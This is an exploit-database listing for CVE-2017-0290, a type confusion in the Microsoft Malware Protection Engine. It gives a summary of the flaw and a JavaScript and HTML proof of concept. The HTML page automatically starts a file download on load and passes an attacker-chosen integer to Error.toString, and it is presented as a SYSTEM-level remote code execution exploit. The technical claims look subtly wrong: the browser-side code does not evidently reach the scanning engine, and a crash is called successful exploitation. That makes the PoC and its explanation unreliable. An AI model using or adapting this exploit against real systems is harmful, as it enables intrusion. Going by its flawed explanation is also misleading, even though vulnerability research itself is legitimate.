Vulners
Lucene search
📄 Microsoft Malware Protection Engine Type Confusion
10
==================================================================================================================================
| # Title : Microsoft Malware Protection Engine Type Confusion Leading to SYSTEM-Level RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.microsoft.com/fr-dz |
==================================================================================================================================
[+] Summary : CVE-2017-0290 is a critical Type Confusion vulnerability in the Microsoft Malware Protection Engine (MsMpEng.exe) that allows remote attackers to execute arbitrary code with NT AUTHORITY\SYSTEM privileges.
The vulnerability can be triggered with little to no user interaction through multiple vectors, including visiting a malicious website, opening a crafted email, or downloading a specially crafted file.
The root cause lies in improper type handling within the toString() method of the JavaScript Error object, where unexpected object types can be passed instead of strings.
This leads to memory misinterpretation and potential control over internal pointers such as the vtable.
Successful exploitation results in an Access Violation (c0000005), which can be leveraged to gain control over the execution flow and ultimately achieve full system compromise.
[+] Key Risk Factors :
Remote Code Execution (RCE)
Executes with SYSTEM-level privileges
Enabled by default (no special configuration required)
Multiple attack vectors (web, email, file-based)
Difficult to detect due to support for numerous file formats
[+] Technical Explanation :
The toString() method expects this.message to be a string.
Instead, an integer is supplied.
In vulnerable versions of the engine, this mismatch leads to:
Type Confusion
Invalid memory access
Crash (Access Violation)
[+] Patch Information : The vulnerability was fixed by Microsoft through a security update released in May 2017.
[+] POC :
function demoTypeConfusion() {
try {
var fakeObject = {
message: 12345
};
var result = Error.prototype.toString.call(fakeObject);
console.log("Result:", result);
} catch (e) {
console.log("Error triggered:", e.message);
}
}
demoTypeConfusion();
HTML POC
<!DOCTYPE html>
<html>
<head>
<title>CVE-2017-0290 PoC</title>
</head>
<body>
<h1>Proof of Concept - CVE-2017-0290</h1>
<p>This file will cause a collapse MsMpEng.exe</p>
<a href="testcase.txt" download id="exploitLink">download</a>
<script>
function triggerExploit() {
var controlledValue = 0x41414111 >> 1;
var maliciousObject = {
message: controlledValue
};
(new Error()).toString.call(maliciousObject);
}
document.getElementById("exploitLink").click();
setTimeout(triggerExploit, 100);
</script>
</body>
</html>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2026 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 37.8
CVSS 29.3
EPSS0.77207